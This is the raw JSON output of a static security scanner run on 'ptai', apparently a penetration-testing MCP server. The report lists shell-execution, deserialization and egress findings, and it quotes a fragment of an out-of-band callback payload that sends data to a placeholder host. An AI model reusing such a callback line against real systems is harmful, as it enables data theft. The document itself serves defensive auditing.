Raw scan report

Ptai — the complete, unedited output of the deterministic mcptrustchecker engine v1.7.0, scanned . Every finding, capability tag and score component below is exactly what the engine produced — no AI, no post-processing.

← Back to the scan page
{
  "tool": {
    "name": "mcptrustchecker",
    "version": "1.7.0",
    "methodologyVersion": "mcptrustchecker-1.7"
  },
  "target": {
    "id": "ptai",
    "source": {
      "kind": "package",
      "origin": "ptai"
    },
    "server": {
      "name": "ptai"
    }
  },
  "grade": "D",
  "score": {
    "score": 66,
    "threatScore": 73,
    "grade": "D",
    "band": "D",
    "categorySubtotals": {
      "injection": 15.4,
      "exfiltration": 0,
      "permissions": 11.66,
      "supply-chain": 0,
      "network": 0,
      "hygiene": 0
    },
    "vector": [
      {
        "kind": "threat",
        "ruleId": "MTC-SRC-004",
        "category": "injection",
        "severity": "high",
        "confidence": "strong",
        "rawWeight": 22,
        "confidenceMult": 0.7,
        "diminishingFactor": 1,
        "appliedPenalty": 15.4
      },
      {
        "kind": "threat",
        "ruleId": "MTC-SRC-007",
        "category": "permissions",
        "severity": "medium",
        "confidence": "strong",
        "rawWeight": 9,
        "confidenceMult": 0.7,
        "diminishingFactor": 1,
        "appliedPenalty": 6.3
      },
      {
        "kind": "threat",
        "ruleId": "MTC-SRC-007",
        "category": "permissions",
        "severity": "medium",
        "confidence": "strong",
        "rawWeight": 9,
        "confidenceMult": 0.7,
        "diminishingFactor": 0.5,
        "appliedPenalty": 3.15
      },
      {
        "kind": "threat",
        "ruleId": "MTC-SRC-007",
        "category": "permissions",
        "severity": "medium",
        "confidence": "strong",
        "rawWeight": 9,
        "confidenceMult": 0.7,
        "diminishingFactor": 0.25,
        "appliedPenalty": 1.58
      },
      {
        "kind": "threat",
        "ruleId": "MTC-SRC-007",
        "category": "permissions",
        "severity": "medium",
        "confidence": "strong",
        "rawWeight": 9,
        "confidenceMult": 0.7,
        "diminishingFactor": 0.1,
        "appliedPenalty": 0.63
      },
      {
        "kind": "client",
        "term": "capability-exposure",
        "level": "high",
        "label": "capability blast radius (high) — client exposure if the model is manipulated",
        "appliedPenalty": 6
      },
      {
        "kind": "client",
        "term": "verification-discount",
        "level": "repo",
        "label": "publisher verification (public source) — no provenance, but the source is public and inspectable",
        "appliedPenalty": 1
      },
      {
        "kind": "client",
        "term": "coverage-honesty",
        "level": "source",
        "label": "inspection depth (source) — how much of the target the scan could see",
        "appliedPenalty": 0
      }
    ],
    "gatesFired": [],
    "methodologyVersion": "mcptrustchecker-1.7"
  },
  "capability": {
    "level": "high",
    "reasons": [
      "can send data / act on an external service",
      "can execute shell commands or code"
    ],
    "tags": [
      "external-sink",
      "code-exec"
    ]
  },
  "coverage": {
    "level": "source",
    "inputs": {
      "toolSurface": true,
      "implementationSource": true,
      "packageMetadata": true,
      "liveTransport": false
    },
    "caveats": [
      "Tools were statically extracted from the published source (52 recovered), not enumerated from a running server. Tool-poisoning, Unicode-smuggling, capability and toxic-flow analysis ran on this inferred surface, but a mis-parsed registration could be missed or mis-attributed, so tool-derived findings are capped below “confirmed”. To grade the real runtime surface, scan the running server: --command \"npx -y <package>\"."
    ]
  },
  "findings": [
    {
      "ruleId": "MTC-SRC-004",
      "title": "Obfuscated / encoded payload in server code (tests/test_probe_exif_metadata.py)",
      "category": "injection",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`tests/test_probe_exif_metadata.py:26`): Decoding an encoded blob and executing it is how malicious logic is hidden from human review of the source. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "tests/test_probe_exif_metadata.py"
      },
      "evidence": "\\x0f\\x01\\x02\\x00\\x02\\x00\\x00\\x00",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-004",
        "file": "tests/test_probe_exif_metadata.py",
        "line": 26
      }
    },
    {
      "ruleId": "MTC-CAP-001",
      "title": "Tool \"kill_process\" exposes command/code execution",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "Tool \"kill_process\" appears to run shell commands or evaluate code (keyword \"subprocess\"). Arbitrary execution driven by model input is one of the most dangerous MCP capabilities; combined with any untrusted input it becomes RCE.",
      "remediation": "Sandbox execution, allowlist commands/arguments, and never pass model output to a shell unescaped.",
      "location": {
        "kind": "tool",
        "name": "kill_process"
      },
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "tags": [
          "code-exec"
        ]
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (cli/credential_resolvers/op.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`cli/credential_resolvers/op.py:39`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "cli/credential_resolvers/op.py"
      },
      "evidence": "subprocess.run(",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "cli/credential_resolvers/op.py",
        "line": 39
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (cli/menu.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`cli/menu.py:391`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "cli/menu.py"
      },
      "evidence": "subprocess.run(",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "cli/menu.py",
        "line": 391
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (engine/oob/payloads.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/oob/payloads.py:158`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/oob/payloads.py"
      },
      "evidence": "os.system(",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "engine/oob/payloads.py",
        "line": 158
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (engine/probes/web/deserialization.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/probes/web/deserialization.py:63`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/probes/web/deserialization.py"
      },
      "evidence": "child_process",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "engine/probes/web/deserialization.py",
        "line": 63
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (engine/probes/web/nextjs_rsc_rce.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/probes/web/nextjs_rsc_rce.py:38`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/probes/web/nextjs_rsc_rce.py"
      },
      "evidence": "child_process",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "engine/probes/web/nextjs_rsc_rce.py",
        "line": 38
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (engine/probes/web/prototype_pollution.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/probes/web/prototype_pollution.py:17`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/probes/web/prototype_pollution.py"
      },
      "evidence": "child_process",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "engine/probes/web/prototype_pollution.py",
        "line": 17
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (engine/tool_installer.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/tool_installer.py:535`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/tool_installer.py"
      },
      "evidence": "shell=True",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "engine/tool_installer.py",
        "line": 535
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (mcp_server/server.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`mcp_server/server.py:340`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "mcp_server/server.py"
      },
      "evidence": "shell=True",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "mcp_server/server.py",
        "line": 340
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (tests/test_ci_result_guard.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`tests/test_ci_result_guard.py:27`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "tests/test_ci_result_guard.py"
      },
      "evidence": "subprocess.run(",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "tests/test_ci_result_guard.py",
        "line": 27
      }
    },
    {
      "ruleId": "MTC-SRC-002",
      "title": "Shell/command execution in server code (tests/test_cli_start_clean_exit.py)",
      "category": "permissions",
      "severity": "high",
      "confidence": "strong",
      "description": "In the server's implementation (`tests/test_cli_start_clean_exit.py:70`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "tests/test_cli_start_clean_exit.py"
      },
      "evidence": "subprocess.run(",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-002",
        "file": "tests/test_cli_start_clean_exit.py",
        "line": 70
      }
    },
    {
      "ruleId": "MTC-SRC-003",
      "title": "Hardcoded egress to an external endpoint (engine/oob/payloads.py)",
      "category": "exfiltration",
      "severity": "medium",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/oob/payloads.py:138`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/oob/payloads.py"
      },
      "evidence": "fetch('http://{OAST}/?c='",
      "owasp": "LLM02:2025 Sensitive Information Disclosure",
      "data": {
        "rule": "MTC-SRC-003",
        "file": "engine/oob/payloads.py",
        "line": 138
      }
    },
    {
      "ruleId": "MTC-SRC-007",
      "title": "Unsafe deserialization (engine/probes/web/__init__.py)",
      "category": "permissions",
      "severity": "medium",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/probes/web/__init__.py:19`): Deserializing untrusted data with these APIs can execute arbitrary code (a well-known RCE gadget class). This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/probes/web/__init__.py"
      },
      "evidence": "node-serialize",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-007",
        "file": "engine/probes/web/__init__.py",
        "line": 19
      }
    },
    {
      "ruleId": "MTC-SRC-007",
      "title": "Unsafe deserialization (engine/probes/web/cve_poc_primitives.py)",
      "category": "permissions",
      "severity": "medium",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/probes/web/cve_poc_primitives.py:102`): Deserializing untrusted data with these APIs can execute arbitrary code (a well-known RCE gadget class). This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/probes/web/cve_poc_primitives.py"
      },
      "evidence": "node-serialize",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-007",
        "file": "engine/probes/web/cve_poc_primitives.py",
        "line": 102
      }
    },
    {
      "ruleId": "MTC-SRC-007",
      "title": "Unsafe deserialization (engine/probes/web/deserialization.py)",
      "category": "permissions",
      "severity": "medium",
      "confidence": "strong",
      "description": "In the server's implementation (`engine/probes/web/deserialization.py:3`): Deserializing untrusted data with these APIs can execute arbitrary code (a well-known RCE gadget class). This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "engine/probes/web/deserialization.py"
      },
      "evidence": "node-serialize",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-007",
        "file": "engine/probes/web/deserialization.py",
        "line": 3
      }
    },
    {
      "ruleId": "MTC-SRC-007",
      "title": "Unsafe deserialization (tests/test_probe_cve_poc.py)",
      "category": "permissions",
      "severity": "medium",
      "confidence": "strong",
      "description": "In the server's implementation (`tests/test_probe_cve_poc.py:121`): Deserializing untrusted data with these APIs can execute arbitrary code (a well-known RCE gadget class). This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.",
      "remediation": "Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.",
      "location": {
        "kind": "server",
        "name": "tests/test_probe_cve_poc.py"
      },
      "evidence": "node-serialize",
      "owasp": "LLM05:2025 Improper Output Handling",
      "data": {
        "rule": "MTC-SRC-007",
        "file": "tests/test_probe_cve_poc.py",
        "line": 121
      }
    },
    {
      "ruleId": "MTC-CAP-005",
      "title": "Mutating tool \"kill_process\" declares no destructiveHint",
      "category": "hygiene",
      "severity": "low",
      "confidence": "heuristic",
      "description": "Tool \"kill_process\" can mutate/egress but declares no destructiveHint. Clients that don't default to spec-safe behavior may not prompt before running it.",
      "remediation": "Declare accurate annotations, and gate destructive tools on user confirmation regardless.",
      "location": {
        "kind": "tool",
        "name": "kill_process"
      },
      "data": {
        "tags": [
          "code-exec"
        ]
      }
    }
  ],
  "toxicFlows": [],
  "capabilities": [
    {
      "tool": "list_probes",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "run_probe",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "http_request",
      "tags": [
        "external-sink"
      ],
      "reasons": {
        "external-sink": [
          "keyword \"http_request\""
        ]
      }
    },
    {
      "tool": "plan_tools",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "ensure_tools_installed",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "start_engagement",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_engagement_status",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_findings",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "health",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_attack_chains",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "list_tools",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "run_tool",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "run_recon",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_web_app",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "authenticated_scan",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_active_directory",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_cloud",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "discover_attack_chains",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "generate_report",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "generate_detection_rules",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "validate_finding",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_api_security",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_credentials",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_vulnerabilities",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_privesc",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_mobile",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_wireless",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "test_social_engineering",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "browser_inspect",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "select_agent",
      "tags": [
        "external-sink"
      ],
      "reasons": {
        "external-sink": [
          "keyword \"request\""
        ]
      }
    },
    {
      "tool": "list_processes",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "kill_process",
      "tags": [
        "code-exec"
      ],
      "reasons": {
        "code-exec": [
          "keyword \"subprocess\""
        ]
      }
    },
    {
      "tool": "builtin_scan",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "scan_ports_builtin",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "scan_headers_builtin",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "scan_ssl_builtin",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "scan_paths_builtin",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "scan_dns_builtin",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "scan_secrets_builtin",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_engagement_summary",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "list_engagements",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "resume_engagement",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "close_engagement",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "query_compliance",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_evidence",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "list_plugins",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "poll_oob",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "prove_attack_chain",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_config",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "set_intensity",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "start_campaign",
      "tags": [],
      "reasons": {}
    },
    {
      "tool": "get_campaign_summary",
      "tags": [],
      "reasons": {}
    }
  ],
  "surfaceDigest": "1077dba1e7b816220d3f3ba0ae2ad69a1798e70fbdf2b8df3e3d1bbb95aef183",
  "stats": {
    "tools": 52,
    "prompts": 0,
    "resources": 0,
    "findingsBySeverity": {
      "critical": 0,
      "high": 12,
      "medium": 5,
      "low": 1,
      "info": 0
    }
  }
}